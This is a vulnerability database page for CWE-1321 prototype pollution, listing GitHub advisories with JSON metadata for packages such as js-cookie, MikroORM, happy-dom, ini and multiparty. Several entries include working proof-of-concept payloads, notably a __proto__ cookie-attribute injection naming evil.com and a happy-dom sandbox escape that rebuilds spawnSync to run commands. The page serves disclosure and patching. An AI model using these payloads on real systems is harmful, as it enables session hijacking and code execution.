CWE-1321
AllowedImproperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
Abstraction: Variant · Status: Incomplete
The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.
779 vulnerabilities reference this CWE, most recent first.
GHSA-QJ86-V6M7-4QV2
Vulnerability from github – Published: 2024-06-17 18:31 – Updated: 2024-07-05 21:14apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@apphp/object-resolver"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.1.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-36577"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2024-06-17T22:30:00Z",
"nvd_published_at": "2024-06-17T16:15:15Z",
"severity": "HIGH"
},
"details": "apphp js-object-resolver \u003c 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.",
"id": "GHSA-qj86-v6m7-4qv2",
"modified": "2024-07-05T21:14:25Z",
"published": "2024-06-17T18:31:33Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36577"
},
{
"type": "WEB",
"url": "https://github.com/apphp/js-object-resolver/commit/7e347a26bf04d6a4f7525f6605666afbb218afca"
},
{
"type": "WEB",
"url": "https://gist.github.com/mestrtee/c90189f3d8480a5f267395ec40701373"
},
{
"type": "PACKAGE",
"url": "https://github.com/apphp/js-object-resolver"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Object Resolver Prototype Pollution"
}
GHSA-QJX8-664M-686J
Vulnerability from github – Published: 2026-05-21 21:20 – Updated: 2026-06-11 14:05Summary
js-cookie's internal assign() helper copies properties with for...in + plain assignment. When the source object is produced by JSON.parse, the JSON object's "__proto__" member is an own enumerable property, so the for…in enumerates it and the target[key] = source[key] write triggers the Object.prototype.__proto__ setter on the fresh target ({}). The result is a per-instance prototype hijack: Object.prototype itself is untouched, but the merged attributes object now inherits attacker-controlled keys.
Because the consuming set() function then enumerates the merged object with another for...in, every key the attacker placed on the polluted prototype lands in the resulting Set-Cookie string as an attribute pair. The attacker can set domain=, secure=, samesite=, expires=, and path= on cookies whose attributes the developer thought were locked down.
Impact
Any application that forwards a JSON-derived object as the attributes argument to Cookies.set, Cookies.remove, Cookies.withAttributes, or Cookies.withConverter is vulnerable. This is the standard pattern when cookie configuration comes from a backend:
const cfg = await fetch('/config').then(r => r.json());
Cookies.set('session', token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker
A payload of {"__proto__":{"domain":"evil.example","secure":"false","samesite":"None"}} causes js-cookie to emit:
Set-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None
Affected code
// src/assign.mjs — full file
export default function (target) {
for (var i = 1; i < arguments.length; i++) {
var source = arguments[i]
for (var key in source) { // includes own enumerable '__proto__'
target[key] = source[key] // [[Set]] form - fires __proto__ setter
}
}
return target
}
Proof of concept
Node 22.11.0, no third-party deps:
Environment setup
mkdir -p /tmp/jscookie-poc && cd /tmp/jscookie-poc
npm init -y
npm i js-cookie
PoC
ubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs
let lastSetCookie = '';
globalThis.document = {
get cookie() { return ''; },
set cookie(v) { lastSetCookie = v; }
};
const { default: Cookies } = await import('js-cookie');
const attackerAttrs = JSON.parse(
'{"__proto__":{"secure":"false","domain":"evil.com","samesite":"None","expires":-1}}'
);
Cookies.set('session', 'TOKEN', attackerAttrs);
console.log('Set-Cookie that js-cookie wrote to document.cookie:');
console.log(lastSetCookie);
Execution:
Suggested patch
--- a/src/assign.mjs
+++ b/src/assign.mjs
@@
export default function (target) {
for (var i = 1; i < arguments.length; i++) {
var source = arguments[i]
- for (var key in source) {
- target[key] = source[key]
- }
+ for (var key in source) {
+ if (key === '__proto__' || key === 'constructor' || key === 'prototype') continue
+ Object.defineProperty(target, key, {
+ value: source[key],
+ writable: true,
+ enumerable: true,
+ configurable: true,
+ })
+ }
}
return target
}
Equivalent one-liner alternative - iterate own names only and filter:
for (const key of Object.getOwnPropertyNames(source)) {
if (key === '__proto__') continue
target[key] = source[key]
}
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.0.5"
},
"package": {
"ecosystem": "npm",
"name": "js-cookie"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-46625"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-21T21:20:31Z",
"nvd_published_at": "2026-06-10T22:16:59Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`js-cookie`\u0027s internal `assign()` helper copies properties with `for...in` + plain assignment. When the source object is produced by `JSON.parse`, the JSON object\u0027s `\"__proto__\"` member is an *own enumerable* property, so the `for\u2026in` enumerates it and the `target[key] = source[key]` write triggers the **`Object.prototype.__proto__` setter** on the fresh `target` (`{}`). The result is a per-instance prototype hijack: `Object.prototype` itself is untouched, but the merged `attributes` object now inherits attacker-controlled keys.\n\nBecause the consuming `set()` function then enumerates the merged object with another `for...in`, every key the attacker placed on the polluted prototype lands in the resulting `Set-Cookie` string as an attribute pair. The attacker can set `domain=`, `secure=`, `samesite=`, `expires=`, and `path=` on cookies whose attributes the developer thought were locked down.\n\n## Impact\n\nAny application that forwards a JSON-derived object as the `attributes` argument to `Cookies.set`, `Cookies.remove`, `Cookies.withAttributes`, or `Cookies.withConverter` is vulnerable. This is the standard pattern when cookie configuration comes from a backend:\n\n```js\nconst cfg = await fetch(\u0027/config\u0027).then(r =\u003e r.json());\nCookies.set(\u0027session\u0027, token, cfg.cookieAttrs); // cfg.cookieAttrs influenced by attacker\n```\n\nA payload of `{\"__proto__\":{\"domain\":\"evil.example\",\"secure\":\"false\",\"samesite\":\"None\"}}` causes js-cookie to emit:\n\n```\nSet-Cookie: session=TOKEN; path=/; domain=evil.example; secure=false; samesite=None\n```\n\n## Affected code\n\n```js\n// src/assign.mjs \u2014 full file\nexport default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n for (var key in source) { // includes own enumerable \u0027__proto__\u0027\n target[key] = source[key] // [[Set]] form - fires __proto__ setter\n }\n }\n return target\n}\n```\n## Proof of concept\n\nNode 22.11.0, no third-party deps:\n\n### Environment setup\n```bash\nmkdir -p /tmp/jscookie-poc \u0026\u0026 cd /tmp/jscookie-poc\nnpm init -y\nnpm i js-cookie\n```\n\n### PoC\n```js\nubuntu@kuber:/tmp/jscookie-poc$ cat poc.mjs\nlet lastSetCookie = \u0027\u0027;\nglobalThis.document = {\n get cookie() { return \u0027\u0027; },\n set cookie(v) { lastSetCookie = v; }\n};\n\nconst { default: Cookies } = await import(\u0027js-cookie\u0027);\n\nconst attackerAttrs = JSON.parse(\n \u0027{\"__proto__\":{\"secure\":\"false\",\"domain\":\"evil.com\",\"samesite\":\"None\",\"expires\":-1}}\u0027\n);\n\nCookies.set(\u0027session\u0027, \u0027TOKEN\u0027, attackerAttrs);\n\nconsole.log(\u0027Set-Cookie that js-cookie wrote to document.cookie:\u0027);\nconsole.log(lastSetCookie);\n```\n\nExecution:\n\u003cimg width=\"2614\" height=\"1174\" alt=\"cls-2026-05-14-01 44 39\" src=\"https://github.com/user-attachments/assets/120df1fe-7e97-4ca3-904e-ab80d71ecf62\" /\u003e\n\n## Suggested patch\n\n```diff\n--- a/src/assign.mjs\n+++ b/src/assign.mjs\n@@\n export default function (target) {\n for (var i = 1; i \u003c arguments.length; i++) {\n var source = arguments[i]\n- for (var key in source) {\n- target[key] = source[key]\n- }\n+ for (var key in source) {\n+ if (key === \u0027__proto__\u0027 || key === \u0027constructor\u0027 || key === \u0027prototype\u0027) continue\n+ Object.defineProperty(target, key, {\n+ value: source[key],\n+ writable: true,\n+ enumerable: true,\n+ configurable: true,\n+ })\n+ }\n }\n return target\n }\n```\n\nEquivalent one-liner alternative - iterate own names only and filter:\n\n```js\nfor (const key of Object.getOwnPropertyNames(source)) {\n if (key === \u0027__proto__\u0027) continue\n target[key] = source[key]\n}\n```",
"id": "GHSA-qjx8-664m-686j",
"modified": "2026-06-11T14:05:06Z",
"published": "2026-05-21T21:20:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/security/advisories/GHSA-qjx8-664m-686j"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-46625"
},
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/commit/eb3c40e89731e99b8970faaf35ddad249c6c0020"
},
{
"type": "PACKAGE",
"url": "https://github.com/js-cookie/js-cookie"
},
{
"type": "WEB",
"url": "https://github.com/js-cookie/js-cookie/releases/tag/v3.0.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "JavaScript Cookie: Per-instance prototype hijack in assign() enables cookie-attribute injection"
}
GHSA-QPFV-44F3-QQX6
Vulnerability from github – Published: 2026-03-29 15:44 – Updated: 2026-03-31 18:55A prototype pollution vulnerability exists in the Utils.merge helper used internally by MikroORM when merging object structures.
The function did not prevent special keys such as __proto__, constructor, or prototype, allowing attacker-controlled input to modify the JavaScript object prototype when merged.
Exploitation requires application code to pass untrusted user input into ORM operations that merge object structures, such as entity property assignment or query condition construction.
Prototype pollution may lead to denial of service or unexpected application behavior. In certain scenarios, polluted properties may influence query construction and potentially result in SQL injection depending on application code.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@mikro-orm/core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.6.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@mikro-orm/core"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0-dev.0"
},
{
"fixed": "7.0.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-34221"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-29T15:44:16Z",
"nvd_published_at": "2026-03-31T16:16:32Z",
"severity": "HIGH"
},
"details": "A prototype pollution vulnerability exists in the `Utils.merge` helper used internally by MikroORM when merging object structures.\n\nThe function did not prevent special keys such as `__proto__`, `constructor`, or `prototype`, allowing attacker-controlled input to modify the JavaScript object prototype when merged.\n\nExploitation requires application code to pass untrusted user input into ORM operations that merge object structures, such as entity property assignment or query condition construction.\n\nPrototype pollution may lead to denial of service or unexpected application behavior. In certain scenarios, polluted properties may influence query construction and potentially result in SQL injection depending on application code.",
"id": "GHSA-qpfv-44f3-qqx6",
"modified": "2026-03-31T18:55:10Z",
"published": "2026-03-29T15:44:16Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mikro-orm/mikro-orm/security/advisories/GHSA-qpfv-44f3-qqx6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34221"
},
{
"type": "PACKAGE",
"url": "https://github.com/mikro-orm/mikro-orm"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:L/SA:L",
"type": "CVSS_V4"
}
],
"summary": "MikroORM has Prototype Pollution in Utils.merge"
}
GHSA-QPM2-6CQ5-7PQ5
Vulnerability from github – Published: 2025-10-15 20:29 – Updated: 2025-11-27 08:54Summary
The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.
Details
The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).
PoC
Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().
import { Browser } from "happy-dom";
const browser = new Browser({settings: {enableJavaScriptEvaluation: true}});
const page = browser.newPage({console: true});
page.url = 'https://example.com';
let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};'
page.content = `<html>
<script>
function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";}
this.constructor.constructor.__proto__.__proto__.toString = f;
this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;
// Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf
</script>
<body>Hello world!</body></html>`;
await browser.close();
console.log(`The process object is ${process}`);
console.log(process.hasOwnProperty('spawn'));
Impact
Arbitrary code execution via breaking out of the Node.js' vm isolation.
Recommended Immediate Actions
Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to isolated-vm is suggested instead.
Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "happy-dom"
},
"ranges": [
{
"events": [
{
"introduced": "19.0.0"
},
{
"fixed": "20.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-62410"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-15T20:29:04Z",
"nvd_published_at": "2025-10-15T18:15:40Z",
"severity": "CRITICAL"
},
"details": "### Summary\nThe mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads.\n\n### Details\nThe untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like \"process\" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf).\n\n### PoC\nAttackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., \"process\". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn().\n\n```js\nimport { Browser } from \"happy-dom\";\n\nconst browser = new Browser({settings: {enableJavaScriptEvaluation: true}});\nconst page = browser.newPage({console: true});\n\npage.url = \u0027https://example.com\u0027;\nlet payload = \u0027spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined\u0026\u0026(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c\u003ca.stdio.length;c++){var e=a.stdio[c]\u0026\u0026a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output\u0026\u0026a.encoding\u0026\u0026a.encoding!==`buffer`)for(c=0;c\u003cb.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output\u0026\u0026b.output[1],b.stderr=b.output\u0026\u0026b.output[2],b.error\u0026\u0026(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};\u0027\npage.content = `\u003chtml\u003e\n\u003cscript\u003e\n function f() { let process = this; ${payload}; spawnSync(\"touch\", [\"success.flag\"]); return \"success\";} \n this.constructor.constructor.__proto__.__proto__.toString = f;\n this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f;\n // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf\n \n\u003c/script\u003e\n\u003cbody\u003eHello world!\u003c/body\u003e\u003c/html\u003e`;\n\nawait browser.close();\nconsole.log(`The process object is ${process}`);\nconsole.log(process.hasOwnProperty(\u0027spawn\u0027));\n```\n\n### Impact\nArbitrary code execution via breaking out of the Node.js\u0027 vm isolation.\n\n### Recommended Immediate Actions\nUsers can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://github.com/laverdet/isolated-vm) is suggested instead.\n\nCris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory.",
"id": "GHSA-qpm2-6cq5-7pq5",
"modified": "2025-11-27T08:54:46Z",
"published": "2025-10-15T20:29:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62410"
},
{
"type": "WEB",
"url": "https://github.com/capricorn86/happy-dom/commit/f4bd4ebe3fe5abd2be2bcea1c07043c8b0b70eea"
},
{
"type": "PACKAGE",
"url": "https://github.com/capricorn86/happy-dom"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"type": "CVSS_V4"
}
],
"summary": "happy-dom\u0027s `--disallow-code-generation-from-strings` is not sufficient for isolating untrusted JavaScript"
}
GHSA-QQGX-2P2H-9C37
Vulnerability from github – Published: 2020-12-10 16:53 – Updated: 2022-12-03 03:55Overview
The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.
If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.
Patches
This has been patched in 1.3.6.
Steps to reproduce
payload.ini
[__proto__]
polluted = "polluted"
poc.js:
var fs = require('fs')
var ini = require('ini')
var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
> node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "ini"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.3.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7788"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2020-12-10T16:51:39Z",
"nvd_published_at": "2020-12-11T11:15:00Z",
"severity": "HIGH"
},
"details": "### Overview\nThe `ini` npm package before version 1.3.6 has a Prototype Pollution vulnerability.\n\nIf an attacker submits a malicious INI file to an application that parses it with `ini.parse`, they will pollute the prototype on the application. This can be exploited further depending on the context.\n\n### Patches\n\nThis has been patched in 1.3.6.\n\n### Steps to reproduce\n\npayload.ini\n```\n[__proto__]\npolluted = \"polluted\"\n```\n\npoc.js:\n```\nvar fs = require(\u0027fs\u0027)\nvar ini = require(\u0027ini\u0027)\n\nvar parsed = ini.parse(fs.readFileSync(\u0027./payload.ini\u0027, \u0027utf-8\u0027))\nconsole.log(parsed)\nconsole.log(parsed.__proto__)\nconsole.log(polluted)\n```\n\n```\n\u003e node poc.js\n{}\n{ polluted: \u0027polluted\u0027 }\n{ polluted: \u0027polluted\u0027 }\npolluted\n```",
"id": "GHSA-qqgx-2p2h-9c37",
"modified": "2022-12-03T03:55:11Z",
"published": "2020-12-10T16:53:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788"
},
{
"type": "WEB",
"url": "https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1"
},
{
"type": "PACKAGE",
"url": "https://github.com/npm/ini"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-INI-1048974"
},
{
"type": "WEB",
"url": "https://www.npmjs.com/advisories/1589"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse"
}
GHSA-QR4M-JCVC-3382
Vulnerability from github – Published: 2021-05-06 18:12 – Updated: 2021-05-05 18:52All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "dot-notes"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "3.2.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-7717"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-05-05T18:52:45Z",
"nvd_published_at": "2020-09-01T10:15:00Z",
"severity": "CRITICAL"
},
"details": "All versions of package dot-notes up to and including version 3.2.0 are vulnerable to Prototype Pollution via the create function.",
"id": "GHSA-qr4m-jcvc-3382",
"modified": "2021-05-05T18:52:45Z",
"published": "2021-05-06T18:12:00Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7717"
},
{
"type": "WEB",
"url": "https://snyk.io/vuln/SNYK-JS-DOTNOTES-598668"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype Pollution in dot-notes"
}
GHSA-QR4P-C9WR-PHR6
Vulnerability from github – Published: 2021-03-19 21:01 – Updated: 2021-03-18 23:53Prototype pollution vulnerability in 'set-in' versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "set-in"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2020-28273"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": true,
"github_reviewed_at": "2021-03-18T23:53:31Z",
"nvd_published_at": "2020-12-02T15:15:00Z",
"severity": "CRITICAL"
},
"details": "Prototype pollution vulnerability in \u0027set-in\u0027 versions 1.0.0 through 2.0.0 allows attacker to cause a denial of service and may lead to remote code execution.",
"id": "GHSA-qr4p-c9wr-phr6",
"modified": "2021-03-18T23:53:31Z",
"published": "2021-03-19T21:01:46Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28273"
},
{
"type": "WEB",
"url": "https://github.com/ahdinosaur/set-in/commit/e431effa00195a6f06b111e09733cd1445a91a88"
},
{
"type": "WEB",
"url": "https://www.whitesourcesoftware.com/vulnerability-database/CVE-2020-28273"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Prototype pollution in set-in"
}
GHSA-QRX9-X75W-XWJ4
Vulnerability from github – Published: 2023-07-17 15:30 – Updated: 2024-04-04 06:10The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.
{
"affected": [],
"aliases": [
"CVE-2023-3186"
],
"database_specific": {
"cwe_ids": [
"CWE-1321"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-07-17T14:15:10Z",
"severity": "CRITICAL"
},
"details": "The Popup by Supsystic WordPress plugin before 1.10.19 has a prototype pollution vulnerability that could allow an attacker to inject arbitrary properties into Object.prototype.",
"id": "GHSA-qrx9-x75w-xwj4",
"modified": "2024-04-04T06:10:10Z",
"published": "2023-07-17T15:30:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-3186"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/545007fc-3173-47b1-82c4-ed3fd1247b9c"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-QXCH-WHHJ-8956
Vulnerability from github – Published: 2026-05-18 17:35 – Updated: 2026-05-18 17:35Impact
multiparty@4.2.3 and lower versions are vulnerable to denial of service via uncaught exception. By sending a multipart/form-data request with a field name that collides with an inherited Object.prototype property (e.g., __proto__, constructor, toString), the parser invokes .push() on the inherited prototype value rather than an array, throwing a TypeError that propagates as an uncaught exception and crashes the process. Any service accepting multipart uploads via multiparty is affected.
Patches
Users should upgrade to multiparty@4.3.0 or higher.
Workarounds
None.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.3"
},
"package": {
"ecosystem": "npm",
"name": "multiparty"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-8161"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-248"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-18T17:35:01Z",
"nvd_published_at": "2026-05-12T10:16:48Z",
"severity": "HIGH"
},
"details": "### Impact\n\nmultiparty@4.2.3 and lower versions are vulnerable to denial of service via uncaught exception. By sending a `multipart/form-data` request with a field name that collides with an inherited `Object.prototype` property (e.g., `__proto__`, `constructor`, `toString`), the parser invokes `.push()` on the inherited prototype value rather than an array, throwing a `TypeError` that propagates as an uncaught exception and crashes the process. Any service accepting multipart uploads via multiparty is affected.\n\n### Patches\n\nUsers should upgrade to multiparty@4.3.0 or higher.\n\n### Workarounds\n\nNone.",
"id": "GHSA-qxch-whhj-8956",
"modified": "2026-05-18T17:35:01Z",
"published": "2026-05-18T17:35:01Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pillarjs/multiparty/security/advisories/GHSA-qxch-whhj-8956"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8161"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "PACKAGE",
"url": "https://github.com/pillarjs/multiparty"
},
{
"type": "WEB",
"url": "https://github.com/pillarjs/multiparty/releases/tag/v4.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "multiparty: Denial of Service via Prototype Pollution leads to Uncaught Exception"
}
GHSA-QXVV-6MM7-75FH
Vulnerability from github – Published: 2022-05-24 17:16 – Updated: 2022-12-02 21:30Beaker before 0.8.9 allows a sandbox escape, enabling system access and code execution. This occurs because Electron context isolation is not used, and therefore an attacker can conduct a prototype-pollution attack against the Electron internal messaging API.
{
"affected": [],
"aliases": [
"CVE-2020-12079"
],
"database_specific": {
"cwe_ids": [
"CWE-1321",
"CWE-20"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2020-04-23T04:15:00Z",
"severity": "CRITICAL"
},
